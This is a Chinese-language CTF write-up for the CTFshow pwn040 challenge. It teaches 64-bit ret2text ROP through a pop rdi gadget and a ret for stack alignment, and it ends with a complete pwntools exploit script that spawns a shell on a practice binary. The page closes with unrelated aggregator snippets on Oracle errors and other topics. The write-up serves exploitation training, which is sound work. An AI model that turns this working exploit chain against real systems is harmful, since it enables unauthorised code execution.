news 2026/4/17 17:49:45

【CTFshow-pwn系列】02_栈溢出【pwn 040】详解:64位 ROP 与参数传递

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
【CTFshow-pwn系列】02_栈溢出【pwn 040】详解:64位 ROP 与参数传递

本文仅用于技术研究,禁止用于非法用途。

Author:枷锁

在 PWN 039 中,我们学习了 32 位程序如何通过栈构造参数来调用system("/bin/sh")。 来到PWN 040,题目提示依然是熟悉的“Just easy ret2text&&64bit”,但情况有所不同。

虽然题目仍然提供了system函数和/bin/sh字符串,但由于架构变成了64位,参数不再直接放在栈上,而是优先存放在寄存器中。这意味着我们不能简单地把参数写在栈里,而是需要寻找特殊的指令片段(Gadgets)来把栈上的数据“弹”进寄存器。

pwn 040 寄存器传参:POP RDI 的艺术

题目信息与环境侦察

题目描述

pwn40: It has system and '/bin/sh', but they don't work together Just easy ret2text&&64bit

先运行查看提示

解题过程:首先使用checksec检查程序保护情况。

  • Arch:amd64-64-little(64位程序)
  • RELRO:Partial RELRO
  • Stack:No canary found(无栈哨兵)
  • NX:NX enabled(栈不可执行)
  • PIE:No PIE(地址固定)

侦察分析

  1. 64位架构:函数参数传递遵循System V AMD64 ABI约定。
  2. No PIE:Gadgets 和函数地址固定。

第一部分:机制详解 —— 64位参数传递与 Gadgets

1. 64位调用约定 (Calling Convention)

在 64 位 Linux 下,函数调用的前 6 个参数依次存放于以下寄存器中:

  1. RDI(参数 1) ->system 函数只需要这一个
  2. RSI(参数 2)
  3. RDX(参数 3)
  4. RCX(参数 4)
  5. R8(参数 5)
  6. R9(参数 6)

多余的参数才会放在栈上。

2. 我们的目标

我们要调用system("/bin/sh")。 根据约定,字符串"/bin/sh"的地址必须存放在RDI寄存器中。

3. 如何控制 RDI?

我们能控制的只有栈(通过栈溢出)。我们需要找到一段代码(Gadget),它的功能是:从栈顶弹出一个值,存入 RDI,然后返回。

这条指令就是:

pop rdi ; ret

这就是本题解题的“金钥匙”。

第二部分:代码审计与漏洞挖掘

1. 静态分析 (IDA Pro)

Main 函数:

int __fastcall main(int argc, const char **argv, const char **envp) { // ... Logo ... puts("Just easy ret2text&&64bit"); ctfshow(); puts("\nExit"); return 0; }

漏洞函数 ctfshow:

ssize_t ctfshow() { _BYTE buf[10]; // [rsp+6h] [rbp-Ah] BYREF // [漏洞点]:read 读取 50 字节 // buf 大小仅 10 字节,存在溢出 return read(0, buf, 0x32u); }

偏移量计算: 根据 IDA 注释[rbp-Ah]

  • buf距离rbp的偏移是0xA(10 字节)。
  • 64位下Old RBP占 8 字节。
  • 覆盖返回地址所需长度 =10(buf) +8(Old RBP) =18 字节

2. 寻找拼图零件

题目依然提供了hint函数:

int hint() { puts("/bin/sh"); return system("echo 'You find me?'"); }

这为我们提供了system的 PLT 地址和"/bin/sh"的地址。

第三部分:实战操作与 Payload 构造

1. 寻找 Gadgets

我们需要找到pop rdi; ret。 使用ROPgadgetpwntools

ROPgadget --binary pwn --only "pop|ret" | grep rdi # 输出示例:0x0000000000400833 : pop rdi ; ret

同时,为了防止 64 位system调用的栈对齐问题 (Stack Alignment)(即 movaps 崩溃),我们在调用system前最好加一个ret指令作为填充。

2. Payload 结构解析

我们需要构造一条ROP 链 (ROP Chain),逻辑如下:

  1. Padding:填充 18 字节,到达返回地址。
  2. Gadget 1 (pop rdi):覆盖返回地址。程序返回时,跳到这里执行pop rdi
  3. 参数 (/bin/sh):紧跟在pop rdi之后。pop rdi会把这个地址从栈上弹出来,放进 RDI 寄存器。
  4. Gadget 2 (ret):用于栈对齐(可选但推荐)。
  5. System 地址:RDI 准备好后,跳转到system执行。

内存视角:

+----------------------+ | 'a' * 18 (Padding) | +----------------------+ | pop_rdi 的地址 | <-- 原始返回地址被覆盖为这里 +----------------------+ | /bin/sh 的地址 | <-- pop rdi 执行时,栈顶是这个,于是 RDI = /bin/sh +----------------------+ | ret 的地址 | <-- pop rdi 里的 ret 执行时,跳到这里 (空转,对齐栈) +----------------------+ | system 的地址 | <-- ret 执行时,跳到这里,RDI 依然保持 /bin/sh +----------------------+

3. 完整 EXP 脚本

from pwn import * # 1. 基础配置 context.log_level = 'debug' context.arch = 'amd64' # 2. 建立连接 io = process('./pwn') # io = remote('pwn.challenge.ctf.show', 28191) # 端口根据实际情况修改 # 3. 加载 ELF 文件 elf = ELF('./pwn') # 4. 搜集拼图零件 # [零件1] system 函数地址 system_addr = elf.plt['system'] log.success(f"System Address: {hex(system_addr)}") # [零件2] "/bin/sh" 字符串地址 bin_sh_addr = next(elf.search(b'/bin/sh')) log.success(f"'/bin/sh' Address: {hex(bin_sh_addr)}") # [零件3] Gadgets # 使用 ROP 对象自动查找 rop = ROP(elf) pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0] ret = rop.find_gadget(['ret'])[0] log.success(f"pop rdi; ret: {hex(pop_rdi)}") log.success(f"ret: {hex(ret)}") # 5. 构造 Payload # 偏移量 = 10 (buf) + 8 (rbp) = 18 offset = 18 # 构造 ROP 链 payload = flat([ b'a' * offset, # 1. 填充溢出 pop_rdi, # 2. 跳转到 pop rdi; ret bin_sh_addr, # 3. pop rdi 的参数:/bin/sh 放入 RDI ret, # 4. 栈对齐 (防止 movaps 崩溃) system_addr # 5. 调用 system ]) # 6. 发送 Payload io.sendline(payload) # 7. 获取 Shell io.interactive()

运行结果

[DEBUG] Sent 0x2a bytes: 00000000 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 │aaaa│aaaa│aaaa│aaaa│ 00000010 61 61 83 07 40 00 00 00 00 00 87 07 40 00 00 00 │aa··│@···│····│@···│ 00000020 00 00 09 05 40 00 00 00 00 00 50 05 40 00 00 00 │····│@···│··P·│@···│ 00000030 00 00 │··│ [*] Switching to interactive mode $ cat /ctfshow_flag ctfshow{...}

总结:PWN 040 的核心逻辑

维度32位 (pwn 039)64位 (pwn 040)
传参方式栈传参寄存器传参 (RDI, RSI…)
Payload 结构Padding + Func + Ret + ArgPadding + Gadget + Arg + Func
核心指令无需特殊指令pop rdi; ret
栈对齐通常不需要需要 (ret gadget)

核心启示: 这是大家遇到的第一个真正的64位 ROP

  • 找 Gadget:这是 64 位 PWN 的基本功。pop rdi是最常用的 Gadget 之一。
  • 理解栈与寄存器的转换:我们通过控制栈上的数据,利用pop指令将其“搬运”到寄存器中,从而满足函数的调用约定。

宇宙级免责声明 🚨 重要声明:本文仅供合法授权下的安全研究与教育目的!🚨 1.合法授权:本文所述技术仅适用于已获得明确书面授权的目标或自己的靶场内系统。未经授权的渗透测试、漏洞扫描或暴力破解行为均属违法,可能导致法律后果(包括但不限于刑事指控、民事诉讼及巨额赔偿)。 2.道德约束:黑客精神的核心是建设而非破坏。请确保你的行为符合道德规范,仅用于提升系统安全性,而非恶意入侵、数据窃取或服务干扰。 3.风险自担:使用本文所述工具和技术时,你需自行承担所有风险。作者及发布平台不对任何滥用、误用或由此引发的法律问题负责。 4.合规性:确保你的测试符合当地及国际法律法规(如《计算机欺诈与滥用法案》(CFAA)、《通用数据保护条例》(GDPR)等)。必要时,咨询法律顾问。 5.最小影响原则:测试过程中应避免对目标系统造成破坏或服务中断。建议在非生产环境或沙箱环境中进行演练。 6.数据保护:不得访问、存储或泄露任何未授权的用户数据。如意外获取敏感信息,应立即报告相关方并删除。 7.免责范围:作者、平台及关联方明确拒绝承担因读者行为导致的任何直接、间接、附带或惩罚性损害责任。

🔐 安全研究的正确姿势:

✅ 先授权,再测试

✅ 只针对自己拥有或有权测试的系统

✅ 发现漏洞后,及时报告并协助修复

✅ 尊重隐私,不越界

⚠️ 警告:技术无善恶,人心有黑白。请明智选择你的道路。

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/16 23:51:49

ORA-00054: resource busy and acquire with NOWAIT specified

1案例&#xff1a;客户想通过alter table def.d read only;的方式停表&#xff0c;然后expdp迁移走部分表。语句找到sid/serial#SELECT s.sid, s.serial#,s.usernameFROM v$transaction t, v$session s,v$lock lWHERE t.status ACTIVE AND t.addrs.TADDR and l.sids.sid and l…

作者头像 李华
网站建设 2026/4/5 17:57:48

ORA-39083 ORA-00904(扩展统计信息)

ORA-39083: Object type TABLE:"ZKM"."TEST" failed to create with error: ORA-00904: "SYS_STUF3GLKIOP5F4B0BTTCFTMX0W": invalid identifier 情况&#xff1a; xx银行expdp&#xff08;11g——19c&#xff09;&#xff0c;导入报错。 扩展…

作者头像 李华
网站建设 2026/3/30 20:27:33

第十三课:权限系统如何设计?——RBAC 与 Spring Security 架构

在做后端系统时&#xff0c;权限几乎是绕不开的一块。 无论是管理后台、SaaS 系统、企业内部系统&#xff0c;还是 App 接口&#xff0c;权限系统设计的好坏&#xff0c;决定了系统后期的可维护性与扩展性。 很多初学者一上来就想写代码、加框架&#xff0c;但权限真正的难点不…

作者头像 李华
网站建设 2026/4/17 5:31:03

计算机毕设Java基于Android的个人日记的设计与实现 安卓端私密日志本的设计与实现 基于Android的个人情感记录与云同步系统开发

计算机毕设Java基于Android的个人日记的设计与实现9bdhi9&#xff08;配套有源码 程序 mysql数据库 论文&#xff09; 本套源码可以在文本联xi,先看具体系统功能演示视频领取&#xff0c;可分享源码参考。在“记录”这件事上&#xff0c;纸笔正被指尖快速替代。碎片化生活让随时…

作者头像 李华
网站建设 2026/4/12 0:33:10

开题报告 springboot和vue智能电子锁的控制与实现

目录开题报告背景技术选型分析系统功能模块实现方案创新点与难点预期成果项目技术支持可定制开发之功能亮点源码获取详细视频演示 &#xff1a;文章底部获取博主联系方式&#xff01;同行可合作开题报告背景 随着物联网技术的发展&#xff0c;智能电子锁逐渐成为智能家居的重要…

作者头像 李华